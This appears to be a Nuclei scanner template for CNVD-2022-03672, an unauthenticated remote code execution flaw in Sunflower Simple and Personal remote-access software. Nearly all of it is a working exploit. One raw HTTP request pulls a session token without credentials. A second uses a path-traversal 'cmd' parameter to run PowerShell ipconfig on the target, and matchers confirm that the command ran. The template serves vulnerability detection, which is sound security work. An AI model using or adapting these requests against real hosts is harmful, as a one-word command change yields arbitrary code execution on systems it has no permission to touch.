id: CNVD-2022-03672 info: name: Sunflower Simple and Personal - Remote Code Execution author: daffainfo severity: critical description: Sunflower Simple and Personal is susceptible to a remote code execution vulnerability. reference: - https://www.1024sou.com/article/741374.html - https://copyfuture.com/blogs-details/202202192249158884 - https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270 - https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cwe-id: CWE-77 tags: cnvd,cnvd2020,sunflower,rce metadata: max-request: 2 http: - raw: - | POST /cgi-bin/rpc HTTP/1.1 Host: {{Hostname}} action=verify-haras - | GET /check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+ipconfig HTTP/1.1 Host: {{Hostname}} Cookie: CID={{cid}} extractors: - type: regex name: cid internal: true group: 1 regex: - '"verify_string":"(.*?)"' req-condition: true matchers: - type: dsl dsl: - "status_code_1==200" - "status_code_2==200" - "contains(body_1, 'verify_string')" - "contains(body_2, 'Windows IP')" condition: and